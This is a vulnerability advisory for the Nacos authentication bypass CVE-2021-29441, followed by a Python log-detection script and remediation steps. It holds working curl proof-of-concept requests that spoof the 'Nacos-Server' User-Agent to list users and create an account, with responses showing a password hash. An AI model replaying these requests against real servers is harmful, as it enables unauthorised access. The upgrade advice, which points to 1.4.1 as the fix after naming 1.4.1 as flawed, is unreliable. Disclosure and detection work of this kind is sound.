Nacos authentication bypass vulnerability (CVE-2021-29441)
Vulnerability description:
Nacos is a dynamic service discovery, configuration and service management platform from Alibaba (China). It supports DNS-based and RPC-based service discovery and provides real-time health checks that stop services from sending requests to unhealthy hosts or service instances, among other features.
In Nacos 1.4.1, the serverIdentity key-value fix for the User-Agent authentication bypass has an implementation flaw: when a user accesses /nacos/v1/auth/users/?username=test&password=test, the trailing slash after users causes authentication to be bypassed, and an attacker can still call arbitrary APIs to create and view users, among other operations.
When the user-agent is "Nacos-Server", authentication is skipped.
Affected versions:
com.alibaba.nacos:nacos-common@(-∞, 1.4.1)
Reproduction / vulnerability detection
Request
curl --location 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' \
--header 'User-Agent: Nacos-Server'
Request and response
[root@localhost ~]# curl -iv --location 'http://172.16.5.125:31500/nacos/v1/auth/users?pageNo=1&pageSize=9' --header 'User-Agent: Nacos-Server'
* About to connect() to 172.16.5.125 port 31500 (#0)
* Trying 172.16.5.125...
* Connected to 172.16.5.125 (172.16.5.125) port 31500 (#0)
> GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
> Host: 172.16.5.125:31500
> Accept: */*
> User-Agent: Nacos-Server
>
< HTTP/1.1 200
HTTP/1.1 200
< Content-Type: application/json;charset=UTF-8
Content-Type: application/json;charset=UTF-8
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Date: Thu, 30 Mar 2023 08:06:32 GMT
Date: Thu, 30 Mar 2023 08:06:32 GMT
<
* Connection #0 to host 172.16.5.125 left intact
{"totalCount":2,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]}
Request
curl --location --request POST 'http://127.0.0.1:8848/nacos/v1/auth/users?username=crow&password=crow' \
--header 'User-Agent: Nacos-Server'
Request and response
[root@localhost ~]# curl -iv --location --request POST 'http://172.16.5.125:31500/nacos/v1/auth/users?username=crow&password=crow' --header 'User-Agent: Nacos-Server'
* About to connect() to 172.16.5.125 port 31500 (#0)
* Trying 172.16.5.125...
* Connected to 172.16.5.125 (172.16.5.125) port 31500 (#0)
> POST /nacos/v1/auth/users?username=crow&password=crow HTTP/1.1
> Host: 172.16.5.125:31500
> Accept: */*
> User-Agent: Nacos-Server
>
< HTTP/1.1 200
HTTP/1.1 200
< Content-Type: application/json;charset=UTF-8
Content-Type: application/json;charset=UTF-8
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Date: Thu, 30 Mar 2023 08:08:27 GMT
Date: Thu, 30 Mar 2023 08:08:27 GMT
<
* Connection #0 to host 172.16.5.125 left intact
{"code":200,"message":"create user ok!","data":null}
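As an added example (not part of the original advisory), the detection logic below runs over constructed access-log lines and flags the two bypass patterns described above: the "Nacos-Server" User-Agent arriving from a host outside the cluster's own address range, and a trailing-slash variant of an auth endpoint that returned success. The cluster network 10.0.0.0/24, the nginx-style log format and all addresses are assumptions.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample access-log lines (nginx combined format with User-Agent);
# addresses, timestamps and paths are made up for this example.
SAMPLE_LOG = """\
10.0.0.11 - - [30/Mar/2023:08:05:01 +0000] "GET /nacos/v1/ns/instance/list?serviceName=demo HTTP/1.1" 200 318 "-" "Nacos-Server"
203.0.113.7 - - [30/Mar/2023:08:06:32 +0000] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 200 152 "-" "Nacos-Server"
203.0.113.7 - - [30/Mar/2023:08:08:27 +0000] "POST /nacos/v1/auth/users?username=crow&password=crow HTTP/1.1" 200 51 "-" "Nacos-Server"
198.51.100.4 - - [30/Mar/2023:08:09:10 +0000] "GET /nacos/v1/auth/users/?pageNo=1&pageSize=9 HTTP/1.1" 200 152 "-" "curl/7.29.0"
10.0.0.12 - - [30/Mar/2023:08:10:00 +0000] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 403 23 "-" "Mozilla/5.0"
"""

# Address range of the legitimate Nacos cluster members (assumption for this example).
CLUSTER_NETS = [ip_network("10.0.0.0/24")]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def from_cluster(ip: str) -> bool:
    """True if the source address belongs to a known cluster member."""
    addr = ip_address(ip)
    return any(addr in net for net in CLUSTER_NETS)


def detect(log_text: str) -> list[dict]:
    """Return one finding per log line that matches either bypass pattern."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        path = rec["path"].split("?", 1)[0]
        # Pattern 1: the server-to-server User-Agent presented by a non-member host.
        # The allowlist applies to every API, so this check is not limited to /auth/.
        if rec["ua"] == "Nacos-Server" and not from_cluster(rec["ip"]):
            findings.append({**rec, "reason": "Nacos-Server UA from non-cluster source"})
        # Pattern 2: trailing slash on an auth endpoint that nevertheless returned 2xx.
        elif path.startswith("/nacos/v1/auth/") and path.endswith("/") and rec["status"].startswith("2"):
            findings.append({**rec, "reason": "trailing-slash auth path returned 2xx"})
    return findings
```

Run `detect(SAMPLE_LOG)` on the constructed input: the cluster member on the first line and the denied browser request on the last line are not flagged, the other three are.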
Remediation:
Upgrade the component com.alibaba.nacos:nacos-common to version 1.4.1 or later.
Modify the Nacos configuration
# Disable the User-Agent allowlist; when set to true, requests with the default user-agent "Nacos-Server" skip authentication
nacos.core.auth.enable.userAgentAuthWhite=false
References:
https://www.oscs1024.com/hd/MPS-2021-5683
https://nvd.nist.gov/vuln/detail/CVE-2021-29441
https://github.com/alibaba/nacos/issues/4701